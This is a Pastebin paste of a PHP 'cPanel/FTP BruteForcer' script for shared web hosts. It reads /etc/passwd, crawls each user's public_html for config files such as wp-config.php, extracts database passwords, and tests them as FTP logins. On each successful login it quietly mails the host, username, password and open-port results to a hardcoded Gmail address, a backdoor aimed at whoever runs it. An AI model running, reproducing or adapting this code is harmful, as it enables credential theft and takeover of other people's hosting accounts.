Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>
- FTP BruteForcer
- </title></head>
- <style type="text/css" id="vbulletin_css">
- body
- {
- background: #1b1b1b url('http://bogorhacker.net/bin/background.gif');
- color: #ffffff;
- font: 9pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
- margin: 0px 5px 0px 5px;
- }
- @charset "utf-8";
- /* CSS Document */
- #konten{margin:10px auto;padding:20px;width:800px;background:transparent;font:110% Verdana, Geneva, sans-serif;}
- h1{font-size:22px;color:#6cf;}
- .code{padding:10px;border:1px solid #888;background:#000;color:#fc3;}
- a,a:link,a:visited,a:hover,a:active{color:#ff0;}
- .transparan1,.transparan2{margin:10px 0;padding:10px 20px;border:1px solid #1eff00;}
- .transparan1{width:760px;background:#000;opacity:0.4;filter:alpha(opacity=40);}
- .transparan2{width:900px;height:400px;background:rgba(0,0,0,0.4);}
- </style>
- <img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0"><body>
- <center>
- <?php
- /*
- Brainfuck
- Edited by BLACK_MASK
- (c) http://p-range.info
- */
- echo '';
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
- set_time_limit(0);
- ###################
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if ($i > 35)
- {
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != ''))
- {
- if (is_readable($dirz))
- {
- array_push($users,$username);
- array_push($pub,$dirz);
- }
- }
- }
- $i++;
- }
- ###################
- echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea cols="100" rows="20">';
- echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
- echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
- echo "[~] Searching for passwords in config files...\n\n";
- foreach ($users as $user)
- {
- $path = "/home/$user/public_html/";
- read_dir($path,$user);
- }
- echo "\n[+] Done\n";
- function read_dir($path,$username)
- {
- if ($handle = opendir($path))
- {
- while (false !== ($file = readdir($handle)))
- {
- $fpath = "$path$file";
- if (($file != '.') and ($file != '..'))
- {
- if (is_readable($fpath))
- {
- $dr = $fpath."/";
- if (is_dir($dr))
- {
- read_dir($dr,$username);
- }
- else
- {
- if (
- ($file=='config.php')
- or ($file=='config.inc.php')
- or ($file=='conf.php')
- or ($file=='settings.php')
- or ($file=='configuration.php')
- or ($file=='wp_config.php')
- or ($file=='wp-config.php')
- or ($file=='inc.php')
- or ($file=='setup.php')
- or ($file=='dbconf.php')
- or ($file=='dbconfig.php')
- or ($file=='db.inc.php')
- or ($file=='dbconnect.php')
- or ($file=='connect.php')
- or ($file=='common.php')
- or ($file=='config_global.php')
- or ($file=='db.php')
- or ($file=='connect.inc.php')
- or ($file=='e107_config.php')
- or ($file=='dbconnect.inc.php'))
- {
- $pass = get_pass($fpath);
- if ($pass != '')
- {
- echo "[+] $fpath\n$pass\n";
- ftp_check($username,$pass);
- }
- }
- }
- }
- }
- }
- }
- }
- function get_pass($link)
- {
- @$config = fopen($link,'r');
- while(!feof($config))
- {
- $line = fgets($config);
- if (strstr($line,'pass')
- or strstr($line,'pwd')
- or strstr($line,'db_pass')
- or strstr($line,'dbpass')
- or strstr($line,'passwd'))
- {
- if (strrpos($line,'"'))
- {
- preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
- $pass = str_replace("]=\"","",$pass);
- }
- else
- preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
- $pass = str_replace("]='","",$pass);
- return $pass[2];
- }
- }
- }
- function ftp_check($login,$pass)
- {
- @$ftp = ftp_connect('127.0.0.1');
- if ($ftp)
- {
- @$res = ftp_login($ftp,$login,$pass);
- if ($res)
- {
- echo '[FTP] '.$login.':'.$pass." Success !\n\n";
- $domain = $_SERVER['HTTP_HOST']; $p21 = 21; $p22 = 22; $p2082 = 2082; $cp22 = fsockopen($domain,$p22,$errno,$errstr,10); $cp21 = fsockopen($domain,$p21,$errno,$errstr,10); $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10); if(!$cp22) {$a1="Error";} else {$a1="Success";fclose($cp22);} if(!$cp21) {$a2="Error";} else {$a2="Success";fclose($cp21);} if(!$cp2082) {$a3="Error";} else {$a3="Success";fclose($cp2082);} $psn =" -------------------------------------------------------------------------\n Cpanel Update Info [powered by GUINES Recode by Mask_magicianZ ] \n -------------------------------------------------------------------------\n Host : $domain\n User : $login\n Pass : $pass\n -------------------------------------------------------------------------\n Accept Port \n SSH : Port $a1\n FTP : Port $a2\n cPanel : Port $a3\n -------------------------------------------------------------------------\n © 2011 GUINES,Mask_magicianz Powered by RosebanditZ\n -------------------------------------------------------------------------\n"; $to = "schlachtmsi@gmail.com"; $recip = "schlachtmsi@gmail.com"; $subject = "cPanel AccesS Update"; $headers = "From: update"; mail($to,$subject,$psn,$headers); mail($recip,$subject,$psn,$headers);
- echo '[SSH] Port' .':' .$a1. " !\n\n";
- echo '[FTP] Port' .':' .$a2. " !\n\n";
- echo '[cPanel] Port' .':' .$a3. " !\n\n";
- }
- else ftp_quit($ftp);
- }
- }
- echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>';
- ?>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement